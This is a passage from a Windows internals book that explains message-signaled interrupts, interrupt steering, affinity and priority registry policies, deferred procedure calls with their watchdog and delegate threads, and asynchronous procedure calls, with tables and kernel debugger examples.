Shared interrupts are often the cause of high interrupt latency and can also
cause stability issues. They are typically undesirable and a side effect of the
limited number of physical interrupt lines on a computer. For example, in the
case of a 4-in-1 media card reader that can handle USB, Compact Flash, Sony
Memory Stick, Secure Digital, and other formats, all the controllers that are
part of the same physical device would typically be connected to a single
interrupt line, which is then configured by the different device drivers as a
shared interrupt vector. This adds latency as each one is called in a sequence
to determine the actual controller that is sending the interrupt for the media
device.
A much better solution is for each device controller to have its own
interrupt and for one driver to manage the different interrupts, knowing
which device they came from. However, consuming four traditional IRQ
lines for a single device quickly leads to IRQ line exhaustion. Additionally,
PCI devices are each connected to only one IRQ line anyway, so the media
card reader cannot use more than one IRQ in the first place even if it wanted
to.
Other problems with generating interrupts through an IRQ line is that
incorrect management of the IRQ signal can lead to interrupt storms or other
kinds of deadlocks on the machine because the signal is driven “high” or
“low” until the ISR acknowledges it. (Furthermore, the interrupt controller
must typically receive an EOI signal as well.) If either of these does not
happen due to a bug, the system can end up in an interrupt state forever,
further interrupts could be masked away, or both. Finally, line-based
interrupts provide poor scalability in multiprocessor environments. In many
cases, the hardware has the final decision as to which processor will be
interrupted out of the possible set that the Plug and Play manager selected for
this interrupt, and device drivers can do little about it.
A solution to all these problems was first introduced in the PCI 2.2
standard called message-signaled interrupts (MSI). Although it was an
optional component of the standard that was seldom found in client machines
(and mostly found on servers for network card and storage controller
performance), most modern systems, thanks to PCI Express 3.0 and later,
fully embrace this model. In the MSI world, a device delivers a message to
its driver by writing to a specific memory address over the PCI bus; in fact,
this is essentially treated like a Direct Memory Access (DMA) operation as
far as hardware is concerned. This action causes an interrupt, and Windows
then calls the ISR with the message content (value) and the address where the
message was delivered. A device can also deliver multiple messages (up to
32) to the memory address, delivering different payloads based on the event.
For even more performance and latency-sensitive systems, MSI-X, an
extension to the MSI model, which is introduced in PCI 3.0, adds support for
32-bit messages (instead of 16-bit), a maximum of 2048 different messages
(instead of just 32), and more importantly, the ability to use a different
address (which can be dynamically determined) for each of the MSI
payloads. Using a different address allows the MSI payload to be written to a
different physical address range that belongs to a different processor, or a
different set of target processors, effectively enabling nonuniform memory
access (NUMA)-aware interrupt delivery by sending the interrupt to the
processor that initiated the related device request. This improves latency and
scalability by monitoring both load and the closest NUMA node during
interrupt completion.
In either model, because communication is based across a memory value,
and because the content is delivered with the interrupt, the need for IRQ lines
is removed (making the total system limit of MSIs equal to the number of
interrupt vectors, not IRQ lines), as is the need for a driver ISR to query the
device for data related to the interrupt, decreasing latency. Due to the large
number of device interrupts available through this model, this effectively
nullifies any benefit of sharing interrupts, decreasing latency further by
directly delivering the interrupt data to the concerned ISR.
This is also one of the reasons why you’ve seen this text, as well as most
of the debugger commands, utilize the term “GSIV” instead of IRQ because
it more generically describes an MSI vector (which is identified by a negative
number), a traditional IRQ-based line, or even a General Purpose Input
Output (GPIO) pin on an embedded device. And, additionally, on ARM and
ARM64 systems, neither of these models are used, and a Generic Interrupt
Controller, or GIC, architecture is leveraged instead. In Figure 8-16, you can
see the Device Manager on two computer systems showing both traditional
IRQ-based GSIV assignments, as well as MSI values, which are negative.
Figure 8-16 IRQ and MSI-based GSIV assignment.
Interrupt steering
On client (that is, excluding Server SKUs) systems that are not running
virtualized, and which have between 2 and 16 processors in a single
processor group, Windows enables a piece of functionality called interrupt
steering to help with power and latency needs on modern consumer systems.
Thanks to this feature, interrupt load can be spread across processors as
needed to avoid bottlenecking a single CPU, and the core parking engine,
which was described in Chapter 6 of Part 1, can also steer interrupts away
from parked cores to avoid interrupt distribution from keeping too many
processors awake at the same time.
Interrupt steering capabilities are dependent on interrupt controllers— for
example, on ARM systems with a GIC, both level sensitive and edge
(latched) triggered interrupts can be steered, whereas on APIC systems
(unless running under Hyper-V), only level-sensitive interrupts can be
steered. Unfortunately, because MSIs are always level edge-triggered, this
would reduce the benefits of the technology, which is why Windows also
implements an additional interrupt redirection model to handle these
situations.
When steering is enabled, the interrupt controller is simply reprogrammed
to deliver the GSIV to a different processor’s LAPIC (or equivalent in the
ARM GIC world). When redirection must be used, then all processors are
delivery targets for the GSIV, and whichever processor received the interrupt
manually issues an IPI to the target processor to which the interrupt should
be steered toward.
Outside of the core parking engine’s use of interrupt steering, Windows
also exposes the functionality through a system information class that is
handled by KeIntSteerAssignCpuSetForGsiv as part of the Real-Time Audio
capabilities of Windows 10 and the CPU Set feature that was described in the
“Thread scheduling” section in Chapter 4 of Part 1. This allows a particular
GSIV to be steered to a specific group of processors that can be chosen by
the user-mode application, as long as it has the Increase Base Priority
privilege, which is normally only granted to administrators or local service
accounts.
Interrupt affinity and priority
Windows enables driver developers and administrators to somewhat control
the processor affinity (selecting the processor or group of processors that
receives the interrupt) and affinity policy (selecting how processors will be
chosen and which processors in a group will be chosen). Furthermore, it
enables a primitive mechanism of interrupt prioritization based on IRQL
selection. Affinity policy is defined according to Table 8-5, and it’s
configurable through a registry value called InterruptPolicyValue in the
Interrupt Management\Affinity Policy key under the device’s instance key in
the registry. Because of this, it does not require any code to configure—an
administrator can add this value to a given driver’s key to influence its
behavior. Interrupt affinity is documented on Microsoft Docs at
https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/interrupt-
affinity-and-priority.
Table 8-5 IRQ affinity policies
Policy
Meaning
IrqPolicy
MachineD
efault
The device does not require a particular affinity policy.
Windows uses the default machine policy, which (for
machines with less than eight logical processors) is to
select any available processor on the machine.
IrqPolicy
AllCloseP
rocessors
On a NUMA machine, the Plug and Play manager assigns
the interrupt to all the processors that are close to the
device (on the same node). On non-NUMA machines, this
is the same as IrqPolicyAllProcessorsInMachine.
IrqPolicy
OneClose
Processor
On a NUMA machine, the Plug and Play manager assigns
the interrupt to one processor that is close to the device (on
the same node). On non-NUMA machines, the chosen
processor will be any available processor on the system.
IrqPolicy
AllProces
sorsInMa
chine
The interrupt is processed by any available processor on
the machine.
IrqPolicy
Specified
Processor
s
The interrupt is processed only by one of the processors
specified in the affinity mask under the
AssignmentSetOverride registry value.
IrqPolicy
SpreadMe
ssagesAcr
ossAllPro
cessors
Different message-signaled interrupts are distributed across
an optimal set of eligible processors, keeping track of
NUMA topology issues, if possible. This requires MSI-X
support on the device and platform.
IrqPolicy
AllProces
sorsInGro
upWhenSt
eered
The interrupt is subject to interrupt steering, and as such,
the interrupt should be assigned to all processor IDTs as
the target processor will be dynamically selected based on
steering rules.
Other than setting this affinity policy, another registry value can also be
used to set the interrupt’s priority, based on the values in Table 8-6.
Table 8-6 IRQ priorities
Priority
Meaning
IrqPriorit
yUndefin
ed
No particular priority is required by the device. It receives
the default priority (IrqPriorityNormal).
IrqPriorit
yLow
The device can tolerate high latency and should receive a
lower IRQL than usual (3 or 4).
IrqPriorit
yNormal
The device expects average latency. It receives the default
IRQL associated with its interrupt vector (5 to 11).
IrqPriorit
yHigh
The device requires as little latency as possible. It receives
an elevated IRQL beyond its normal assignment (12).
As discussed earlier, it is important to note that Windows is not a real-time
operating system, and as such, these IRQ priorities are hints given to the
system that control only the IRQL associated with the interrupt and provide
no extra priority other than the Windows IRQL priority-scheme mechanism.
Because the IRQ priority is also stored in the registry, administrators are free
to set these values for drivers should there be a requirement of lower latency
for a driver not taking advantage of this feature.
Software interrupts
Although hardware generates most interrupts, the Windows kernel also
generates software interrupts for a variety of tasks, including these:
■ Initiating thread dispatching
■ Non-time-critical interrupt processing
■ Handling timer expiration
■ Asynchronously executing a procedure in the context of a particular
thread
■ Supporting asynchronous I/O operations
These tasks are described in the following subsections.
Dispatch or deferred procedure call (DPC) interrupts
A DPC is typically an interrupt-related function that performs a processing
task after all device interrupts have already been handled. The functions are
called deferred because they might not execute immediately. The kernel uses
DPCs to process timer expiration (and release threads waiting for the timers)
and to reschedule the processor after a thread’s quantum expires (note that
this happens at DPC IRQL but not really through a regular kernel DPC).
Device drivers use DPCs to process interrupts and perform actions not
available at higher IRQLs. To provide timely service for hardware interrupts,
Windows—with the cooperation of device drivers—attempts to keep the
IRQL below device IRQL levels. One way that this goal is achieved is for
device driver ISRs to perform the minimal work necessary to acknowledge
their device, save volatile interrupt state, and defer data transfer or other less
time-critical interrupt processing activity for execution in a DPC at
DPC/dispatch IRQL. (See Chapter 6 in Part 1 for more information on the
I/O system.)
In the case where the IRQL is passive or at APC level, DPCs will
immediately execute and block all other non-hardware-related processing,
which is why they are also often used to force immediate execution of high-
priority system code. Thus, DPCs provide the operating system with the
capability to generate an interrupt and execute a system function in kernel
mode. For example, when a thread can no longer continue executing, perhaps
because it has terminated or because it voluntarily enters a wait state, the
kernel calls the dispatcher directly to perform an immediate context switch.
Sometimes, however, the kernel detects that rescheduling should occur when
it is deep within many layers of code. In this situation, the kernel requests
dispatching but defers its occurrence until it completes its current activity.
Using a DPC software interrupt is a convenient way to achieve this delayed
processing.
The kernel always raises the processor’s IRQL to DPC/dispatch level or
above when it needs to synchronize access to scheduling-related kernel
structures. This disables additional software interrupts and thread
dispatching. When the kernel detects that dispatching should occur, it
requests a DPC/dispatch-level interrupt; but because the IRQL is at or above
that level, the processor holds the interrupt in check. When the kernel
completes its current activity, it sees that it will lower the IRQL below
DPC/dispatch level and checks to see whether any dispatch interrupts are
pending. If there are, the IRQL drops to DPC/dispatch level, and the dispatch
interrupts are processed. Activating the thread dispatcher by using a software
interrupt is a way to defer dispatching until conditions are right. A DPC is
represented by a DPC object, a kernel control object that is not visible to
user-mode programs but is visible to device drivers and other system code.
The most important piece of information the DPC object contains is the
address of the system function that the kernel will call when it processes the
DPC interrupt. DPC routines that are waiting to execute are stored in kernel-
managed queues, one per processor, called DPC queues. To request a DPC,
system code calls the kernel to initialize a DPC object and then places it in a
DPC queue.
By default, the kernel places DPC objects at the end of one of two DPC
queues belonging to the processor on which the DPC was requested
(typically the processor on which the ISR executed). A device driver can
override this behavior, however, by specifying a DPC priority (low, medium,
medium-high, or high, where medium is the default) and by targeting the
DPC at a particular processor. A DPC aimed at a specific CPU is known as a
targeted DPC. If the DPC has a high priority, the kernel inserts the DPC
object at the front of the queue; otherwise, it is placed at the end of the queue
for all other priorities.
When the processor’s IRQL is about to drop from an IRQL of
DPC/dispatch level or higher to a lower IRQL (APC or passive level), the
kernel processes DPCs. Windows ensures that the IRQL remains at
DPC/dispatch level and pulls DPC objects off the current processor’s queue
until the queue is empty (that is, the kernel “drains” the queue), calling each
DPC function in turn. Only when the queue is empty will the kernel let the
IRQL drop below DPC/dispatch level and let regular thread execution
continue. DPC processing is depicted in Figure 8-17.
Figure 8-17 Delivering a DPC.
DPC priorities can affect system behavior another way. The kernel usually
initiates DPC queue draining with a DPC/dispatch-level interrupt. The kernel
generates such an interrupt only if the DPC is directed at the current
processor (the one on which the ISR executes) and the DPC has a priority
higher than low. If the DPC has a low priority, the kernel requests the
interrupt only if the number of outstanding DPC requests (stored in the
DpcQueueDepth field of the KPRCB) for the processor rises above a
threshold (called MaximumDpcQueueDepth in the KPRCB) or if the number
of DPCs requested on the processor within a time window is low.
If a DPC is targeted at a CPU different from the one on which the ISR is
running and the DPC’s priority is either high or medium-high, the kernel
immediately signals the target CPU (by sending it a dispatch IPI) to drain its
DPC queue, but only as long as the target processor is idle. If the priority is
medium or low, the number of DPCs queued on the target processor (this
being the DpcQueueDepth again) must exceed a threshold (the
MaximumDpcQueueDepth) for the kernel to trigger a DPC/dispatch interrupt.
The system idle thread also drains the DPC queue for the processor it runs
on. Although DPC targeting and priority levels are flexible, device drivers
rarely need to change the default behavior of their DPC objects. Table 8-7
summarizes the situations that initiate DPC queue draining. Medium-high
and high appear, and are, in fact, equal priorities when looking at the
generation rules. The difference comes from their insertion in the list, with
high interrupts being at the head and medium-high interrupts at the tail.
Table 8-7 DPC interrupt generation rules
DP
C
Pri
ori
ty
DPC Targeted at ISR’s Processor
DPC Targeted at
Another Processor
Lo
w
DPC queue length exceeds maximum
DPC queue length, or DPC request rate
is less than minimum DPC request rate
DPC queue length
exceeds maximum DPC
queue length, or system
is idle
Me
diu
m
Always
DPC queue length
exceeds maximum DPC
queue length, or system
is idle
Me
diu
m-
Hi
gh
Always
Target processor is idle
Hi
gh
Always
Target processor is idle
Additionally, Table 8-8 describes the various DPC adjustment variables
and their default values, as well as how they can be modified through the
registry. Outside of the registry, these values can also be set by using the
SystemDpcBehaviorInformation system information class.
Table 8-8 DPC interrupt generation variables
Variabl
e
Definition
D
e
f
a
u
lt
Ove
rrid
e
Valu
e
KiMaxi
mumDp
cQueue
Depth
Number of DPCs queued before an interrupt
will be sent even for Medium or below DPCs
4
Dpc
Que
ueD
epth
KiMini
mumDp
cRate
Number of DPCs per clock tick where low
DPCs will not cause a local interrupt to be
generated
3
Mini
mum
Dpc
Rate
KiIdeal
Number of DPCs per clock tick before the
2
Ideal
DpcRate
maximum DPC queue depth is decremented if
DPCs are pending but no interrupt was
generated
0
Dpc
Rate
KiAdjus
tDpcThr
eshold
Number of clock ticks before the maximum
DPC queue depth is incremented if DPCs aren’t
pending
2
0
Adju
stDp
cThr
esho
ld
Because user-mode threads execute at low IRQL, the chances are good
that a DPC will interrupt the execution of an ordinary user’s thread. DPC
routines execute without regard to what thread is running, meaning that when
a DPC routine runs, it can’t assume what process address space is currently
mapped. DPC routines can call kernel functions, but they can’t call system
services, generate page faults, or create or wait for dispatcher objects
(explained later in this chapter). They can, however, access nonpaged system
memory addresses, because system address space is always mapped
regardless of what the current process is.
Because all user-mode memory is pageable and the DPC executes in an
arbitrary process context, DPC code should never access user-mode memory
in any way. On systems that support Supervisor Mode Access Protection
(SMAP) or Privileged Access Neven (PAN), Windows activates these
features for the duration of the DPC queue processing (and routine
execution), ensuring that any user-mode memory access will immediately
result in a bugcheck.
Another side effect of DPCs interrupting the execution of threads is that
they end up “stealing” from the run time of the thread; while the scheduler
thinks that the current thread is executing, a DPC is executing instead. In
Chapter 4, Part 1, we discussed mechanisms that the scheduler uses to make
up for this lost time by tracking the precise number of CPU cycles that a
thread has been running and deducting DPC and ISR time, when applicable.
While this ensures the thread isn’t penalized in terms of its quantum, it
does still mean that from the user’s perspective, the wall time (also
sometimes called clock time—the real-life passage of time) is still being
spent on something else. Imagine a user currently streaming their favorite
song off the Internet: If a DPC were to take 2 seconds to run, those 2 seconds
would result in the music skipping or repeating in a small loop. Similar
impacts can be felt on video streaming or even keyboard and mouse input.
Because of this, DPCs are a primary cause for perceived system
unresponsiveness of client systems or workstation workloads because even
the highest-priority thread will be interrupted by a running DPC. For the
benefit of drivers with long-running DPCs, Windows supports threaded
DPCs. Threaded DPCs, as their name implies, function by executing the
DPC routine at passive level on a real-time priority (priority 31) thread. This
allows the DPC to preempt most user-mode threads (because most
application threads don’t run at real-time priority ranges), but it allows other
interrupts, nonthreaded DPCs, APCs, and other priority 31 threads to
preempt the routine.
The threaded DPC mechanism is enabled by default, but you can disable it
by adding a DWORD value named ThreadDpcEnable in the
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session
Manager\Kernel key, and setting it to 0. A threaded DPC must be initialized
by a developer through the KeInitializeThreadedDpc API, which sets the
DPC internal type to ThreadedDpcObject. Because threaded DPCs can be
disabled, driver developers who make use of threaded DPCs must write their
routines following the same rules as for nonthreaded DPC routines and
cannot access paged memory, perform dispatcher waits, or make assumptions
about the IRQL level at which they are executing. In addition, they must not
use the KeAcquire/ReleaseSpinLockAtDpcLevel APIs because the functions
assume the CPU is at dispatch level. Instead, threaded DPCs must use
KeAcquire/ReleaseSpinLockForDpc, which performs the appropriate action
after checking the current IRQL.
While threaded DPCs are a great feature for driver developers to protect
the system’s resources when possible, they are an opt-in feature—both from
the developer’s point of view and even the system administrator. As such, the
vast majority of DPCs still execute nonthreaded and can result in perceived
system lag. Windows employs a vast arsenal of performance tracking
mechanisms to diagnose and assist with DPC-related issues. The first of
these, of course, is to track DPC (and ISR) time both through performance
counters, as well as through precise ETW tracing.
EXPERIMENT: Monitoring DPC activity
You can use Process Explorer to monitor DPC activity by opening
the System Information dialog box and switching to the CPU tab,
where it lists the number of interrupts and DPCs executed each
time Process Explorer refreshes the display (1 second by default):
You can also use the kernel debugger to investigate the various
fields in the KPRCB that start with Dpc, such as DpcRequestRate,
DpcLastCount, DpcTime, and DpcData (which contains the
DpcQueueDepth and DpcCount for both nonthreaded and threaded
DPCs). Additionally, newer versions of Windows also include an
IsrDpcStats field that is a pointer to an _ISRDPCSTATS structure
that is present in the public symbol files. For example, the
following command will show you the total number of DPCs that
have been queued on the current KPRCB (both threaded and
nonthreaded) versus the number that have executed:
Click here to view code image
lkd> dx new { QueuedDpcCount = @$prcb->DpcData[0].DpcCount +
@$prcb->DpcData[1].DpcCount, ExecutedDpcCount =
((nt!_ISRDPCSTATS*)@$prcb->IsrDpcStats)->DpcCount },d
QueuedDpcCount : 3370380
ExecutedDpcCount : 1766914 [Type: unsigned __int64]
The discrepancy you see in the example output is expected;
drivers might have queued a DPC that was already in the queue, a
condition that Windows handles safely. Additionally, a DPC
initially queued for a specific processor (but not targeting any
specific one), may in some cases execute on a different processor,
such as when the driver uses KeSetTargetProcessorDpc (the API
allows a driver to target the DPC to a particular processor.)
Windows doesn’t just expect users to manually look into latency issues
caused by DPCs; it also includes built-in mechanisms to address a few
common scenarios that can cause significant problems. The first is the DPC
Watchdog and DPC Timeout mechanism, which can be configured through
certain registry values in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\Kernel such as DPCTimeout, DpcWatchdogPeriod, and
DpcWatchdogProfileOffset.
The DPC Watchdog is responsible for monitoring all execution of code at
DISPATCH_LEVEL or above, where a drop in IRQL has not been registered
for quite some time. The DPC Timeout, on the other hand, monitors the
execution time of a specific DPC. By default, a specific DPC times out after
20 seconds, and all DISPATCH_LEVEL (and above) execution times out
after 2 minutes. Both limits are configurable with the registry values
mentioned earlier (DPCTimeout controls a specific DPC time limit, whereas
the DpcWatchdogPeriod controls the combined execution of all the code
running at high IRQL). When these thresholds are hit, the system will either
bugcheck with DPC_WATCHDOG_VIOLATION (indicating which of the
situations was encountered), or, if a kernel debugger is attached, raise an
assertion that can be continued.
Driver developers who want to do their part in avoiding these situations
can use the KeQueryDpcWatchdogInformation API to see the current values
configured and the time remaining. Furthermore, the
KeShouldYieldProcessor API takes these values (and other system state
values) into consideration and returns to the driver a hint used for making a
decision whether to continue its DPC work later, or if possible, drop the
IRQL back to PASSIVE_LEVEL (in the case where a DPC wasn’t executing,
but the driver was holding a lock or synchronizing with a DPC in some way).
On the latest builds of Windows 10, each PRCB also contains a DPC
Runtime History Table (DpcRuntimeHistoryHashTable), which contains a
hash table of buckets tracking specific DPC callback functions that have
recently executed and the amount of CPU cycles that they spent running.
When analyzing a memory dump or remote system, this can be useful in
figuring out latency issues without access to a UI tool, but more importantly,
this data is also now used by the kernel.
When a driver developer queues a DPC through KeInsertQueueDpc, the
API will enumerate the processor’s table and check whether this DPC has
been seen executing before with a particularly long runtime (a default of 100
microseconds but configurable through the LongDpcRuntimeThreshold
registry value in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\Kernel). If this is the case, the LongDpcPresent field will be set in
the DpcData structure mentioned earlier.
For each idle thread (See Part 1, Chapter 4 for more information on thread
scheduling and the idle thread), the kernel now also creates a DPC Delegate
Thread. These are highly unique threads that belong to the System Idle
Process—just like Idle Threads—and are never part of the scheduler’s default
thread selection algorithms. They are merely kept in the back pocket of the
kernel for its own purposes. Figure 8-18 shows a system with 16 logical
processors that now has 16 idle threads as well as 16 DPC delegate threads.
Note that in this case, these threads have a real Thread ID (TID), and the
Processor column should be treated as such for them.
Figure 8-18 The DPC delegate threads on a 16-CPU system.
Whenever the kernel is dispatching DPCs, it checks whether the DPC
queue depth has passed the threshold of such long-running DPCs (this
defaults to 2 but is also configurable through the same registry key we’ve
shown a few times). If this is the case, a decision is made to try to mitigate
the issue by looking at the properties of the currently executing thread: Is it
idle? Is it a real-time thread? Does its affinity mask indicate that it typically
runs on a different processor? Depending on the results, the kernel may
decide to schedule the DPC delegate thread instead, essentially swapping the
DPC from its thread-starving position into a dedicated thread, which has the
highest priority possible (still executing at DISPATCH_LEVEL). This gives a
chance to the old preempted thread (or any other thread in the standby list) to
be rescheduled to some other CPU.
This mechanism is similar to the Threaded DPCs we explained earlier,
with some exceptions. The delegate thread still runs at DISPATCH_LEVEL.
Indeed, when it is created and started in phase 1 of the NT kernel
initialization (see Chapter 12 for more details), it raises its own IRQL to
DISPATCH level, saves it in the WaitIrql field of its kernel thread data
structure, and voluntarily asks the scheduler to perform a context switch to
another standby or ready thread (via the KiSwapThread routine.) Thus, the
delegate DPCs provide an automatic balancing action that the system takes,
instead of an opt-in that driver developers must judiciously leverage on their
own.
If you have a newer Windows 10 system with this capability, you can run
the following command in the kernel debugger to take a look at how often
the delegate thread was needed, which you can infer from the amount of
context switches that have occurred since boot:
Click here to view code image
lkd> dx @$cursession.Processes[0].Threads.Where(t =>
t.KernelObject.ThreadName->
ToDisplayString().Contains("DPC Delegate Thread")).Select(t =>
t.KernelObject.Tcb.ContextSwitches),d
[44] : 2138 [Type: unsigned long]
[52] : 4 [Type: unsigned long]
[60] : 11 [Type: unsigned long]
[68] : 6 [Type: unsigned long]
[76] : 13 [Type: unsigned long]
[84] : 3 [Type: unsigned long]
[92] : 16 [Type: unsigned long]
[100] : 19 [Type: unsigned long]
[108] : 2 [Type: unsigned long]
[116] : 1 [Type: unsigned long]
[124] : 2 [Type: unsigned long]
[132] : 2 [Type: unsigned long]
[140] : 3 [Type: unsigned long]
[148] : 2 [Type: unsigned long]
[156] : 1 [Type: unsigned long]
[164] : 1 [Type: unsigned long]
Asynchronous procedure call interrupts
Asynchronous procedure calls (APCs) provide a way for user programs and
system code to execute in the context of a particular user thread (and hence a
particular process address space). Because APCs are queued to execute in the
context of a particular thread, they are subject to thread scheduling rules and
do not operate within the same environment as DPCs—namely, they do not
operate at DISPATCH_LEVEL and can be preempted by higher priority
threads, perform blocking waits, and access pageable memory.
That being said, because APCs are still a type of software interrupt, they
must somehow still be able to wrangle control away from the thread’s
primary execution path, which, as shown in this section, is in part done by
operating at a specific IRQL called APC_LEVEL. This means that although
APCs don’t operate under the same restrictions as a DPC, there are still
certain limitations imposed that developers must be wary of, which we’ll
cover shortly.
APCs are described by a kernel control object, called an APC object. APCs
waiting to execute reside in one of two kernel-managed APC queues. Unlike
the DPC queues, which are per-processor (and divided into threaded and
nonthreaded), the APC queues are per-thread—with each thread having two
APC queues: one for kernel APCs and one for user APCs.
When asked to queue an APC, the kernel looks at the mode (user or
kernel) of the APC and then inserts it into the appropriate queue belonging to
the thread that will execute the APC routine. Before looking into how and
when this APC will execute, let’s look at the differences between the two
modes. When an APC is queued against a thread, that thread may be in one
of the three following situations:
■ The thread is currently running (and may even be the current thread).
■ The thread is currently waiting.
■ The thread is doing something else (ready, standby, and so on).
First, you might recall from Part 1, Chapter 4, “Thread scheduling,” that a
thread has an alertable state whenever performing a wait. Unless APCs have
been completely disabled for a thread, for kernel APCs, this state is ignored
—the APC always aborts the wait, with consequences that will be explained
later in this section. For user APCs however, the thread is interrupted only if
the wait was alertable and instantiated on behalf of a user-mode component
or if there are other pending user APCs that already started aborting the wait
(which would happen if there were lots of processors trying to queue an APC
to the same thread).
User APCs also never interrupt a thread that’s already running in user
mode; the thread needs to either perform an alertable wait or go through a
ring transition or context switch that revisits the User APC queue. Kernel
APCs, on the other hand, request an interrupt on the processor of the target
thread, raising the IRQL to APC_LEVEL, notifying the processor that it must
look at the kernel APC queue of its currently running thread. And, in both
scenarios, if the thread was doing “something else,” some transition that
takes it into either the running or waiting state needs to occur. As a practical
result of this, suspended threads, for example, don’t execute APCs that are
being queued to them.
We mentioned that APCs could be disabled for a thread, outside of the
previously described scenarios around alertability. Kernel and driver
developers can choose to do so through two mechanisms, one being to
simply keep their IRQL at APC_LEVEL or above while executing some
piece of code. Because the thread is in a running state, an interrupt is
normally delivered, but as per the IRQL rules we’ve explained, if the
processor is already at APC_LEVEL (or higher), the interrupt is masked out.
Therefore, it is only once the IRQL has dropped to PASSIVE_LEVEL that the
pending interrupt is delivered, causing the APC to execute.
The second mechanism, which is strongly preferred because it avoids
changing interrupt controller state, is to use the kernel API
KeEnterGuardedRegion, pairing it with KeLeaveGuardedRegion when you
want to restore APC delivery back to the thread. These APIs are recursive
and can be called multiple times in a nested fashion. It is safe to context
switch to another thread while still in such a region because the state updates
a field in the thread object (KTHREAD) structure—SpecialApcDisable and
not per-processor state.
Similarly, context switches can occur while at APC_LEVEL, even though
this is per-processor state. The dispatcher saves the IRQL in the KTHREAD
using the field WaitIrql and then sets the processor IRQL to the WaitIrql of
the new incoming thread (which could be PASSIVE_LEVEL). This creates an
interesting scenario where technically, a PASSIVE_LEVEL thread can
preempt an APC_LEVEL thread. Such a possibility is common and entirely
normal, proving that when it comes to thread execution, the scheduler
outweighs any IRQL considerations. It is only by raising to
DISPATCH_LEVEL, which disables thread preemption, that IRQLs
supersede the scheduler. Since APC_LEVEL is the only IRQL that ends up
behaving this way, it is often called a thread-local IRQL, which is not
entirely accurate but is a sufficient approximation for the behavior described
herein.
Regardless of how APCs are disabled by a kernel developer, one rule is
paramount: Code can neither return to user mode with the APC at anything
above PASSIVE_LEVEL nor can SpecialApcDisable be set to anything but 0.
Such situations result in an immediate bugcheck, typically meaning some
driver has forgotten to release a lock or leave its guarded region.
In addition to two APC modes, there are two types of APCs for each mode
—normal APCs and special APCs—both of which behave differently
depending on the mode. We describe each combination:
■ Special Kernel APC This combination results in an APC that is
always inserted at the tail of all other existing special kernel APCs in
the APC queue but before any normal kernel APCs. The kernel
routine receives a pointer to the arguments and to the normal routine
of the APC and operates at APC_LEVEL, where it can choose to
queue a new, normal APC.
■ Normal Kernel APC This type of APC is always inserted at the tail
end of the APC queue, allowing for a special kernel APC to queue a
new normal kernel APC that will execute soon thereafter, as described
in the earlier example. These kinds of APCs can not only be disabled
through the mechanisms presented earlier but also through a third API
called KeEnterCriticalRegion (paired with KeLeaveCriticalRegion),
which updates the KernelApcDisable counter in KTHREAD but not
SpecialApcDisable.
■ These APCs first execute their kernel routine at APC_LEVEL,
sending it pointers to the arguments and the normal routine. If the
normal routine hasn’t been cleared as a result, they then drop the
IRQL to PASSIVE_LEVEL and execute the normal routine as well,
with the input arguments passed in by value this time. Once the
normal routine returns, the IRQL is raised back to APC_LEVEL
again.
■ Normal User APC This typical combination causes the APC to be
inserted at the tail of the APC queue and for the kernel routine to first
execute at APC_LEVEL in the same way as the preceding bullet. If a
normal routine is still present, then the APC is prepared for user-
mode delivery (obviously, at PASSIVE_LEVEL) through the creation
of a trap frame and exception frame that will eventually cause the
user-mode APC dispatcher in Ntdll.dll to take control of the thread
once back in user mode, and which will call the supplied user pointer.
Once the user-mode APC returns, the dispatcher uses the NtContinue
or NtContinueEx system call to return to the original trap frame.
■ Note that if the kernel routine ended up clearing out the normal
routine, then the thread, if alerted, loses that state, and, conversely, if
not alerted, becomes alerted, and the user APC pending flag is set,
potentially causing other user-mode APCs to be delivered soon. This
is performed by the KeTestAlertThread API to essentially still behave
as if the normal APC would’ve executed in user mode, even though
the kernel routine cancelled the dispatch.
■ Special User APC This combination of APC is a recent addition to
newer builds of Windows 10 and generalizes a special dispensation
that was done for the thread termination APC such that other
developers can make use of it as well. As we’ll soon see, the act of
terminating a remote (noncurrent) thread requires the use of an APC,
but it must also only occur once all kernel-mode code has finished
executing. Delivering the termination code as a User APC would fit
the bill quite well, but it would mean that a user-mode developer
could avoid termination by performing a nonalertable wait or filling
their queue with other User APCs instead.
To fix this scenario, the kernel long had a hard-coded check to validate if the
kernel routine of a User APC was KiSchedulerApcTerminate. In this
situation, the User APC was recognized as being “special” and put at the
head of the queue. Further, the status of the thread was ignored, and the “user
APC pending” state was always set, which forced execution of the APC at
the next user-mode ring transition or context switch to this thread.
This functionality, however, being solely reserved for the termination code
path, meant that developers who want to similarly guarantee the execution of
their User APC, regardless of alertability state, had to resort to using more
complex mechanisms such as manually changing the context of the thread
using SetThreadContext, which is error-prone at best. In response, the
QueueUserAPC2 API was created, which allows passing in the
QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC flag, officially
exposing similar functionality to developers as well. Such APCs will always
be added before any other user-mode APCs (except the termination APC,
which is now extra special) and will ignore the alertable flag in the case of a
waiting thread. Additionally, the APC will first be inserted exceptionally as a
Special Kernel APC such that its kernel routine will execute almost
instantaneously to then reregister the APC as a special user APC.
Table 8-9 summarizes the APC insertion and delivery behavior for each
type of APC.
Table 8-9 APC insertion and delivery
A
P
C
Ty
pe
Inser
tion
Beha
vior
Delivery Behavior
Sp
eci
al
(k
er
nel
)
Insert
ed
right
after
the
last
specia
l APC
(at
the
head
of all
other
norm
al
APCs
)
Kernel routine delivered at APC level as soon as IRQL
drops, and the thread is not in a guarded region. It is
given pointers to arguments specified when inserting the
APC.
No
rm
al
(k
er
nel
)
Insert
ed at
the
tail of
the
kernel
-
mode
APC
list
Kernel routine delivered at APC_LEVEL as soon as IRQL
drops, and the thread is not in a critical (or guarded)
region. It is given pointers to arguments specified when
inserting the APC. Executes the normal routine, if any, at
PASSIVE_LEVEL after the associated kernel routine was
executed. It is given arguments returned by the associated
kernel routine (which can be the original arguments used
during insertion or new ones).
No
rm
al
(us
er)
Insert
ed at
the
tail of
the
user-
mode
APC
Kernel routine delivered at APC_LEVEL as soon as IRQL
drops and the thread has the “user APC pending” flag set
(indicating that an APC was queued while the thread was
in an alertable wait state). It is given pointers to
arguments specified when inserting the APC. Executes
the normal routine, if any, in user mode at
PASSIVE_LEVEL after the associated kernel routine is
executed. It is given arguments returned by the associated
list
kernel routine (which can be the original arguments used
during insertion or new ones). If the normal routine was
cleared by the kernel routine, it performs a test-alert
against the thread.
Us
er
Th
rea
d
Te
rm
ina
te
A
PC
(K
iSc
he
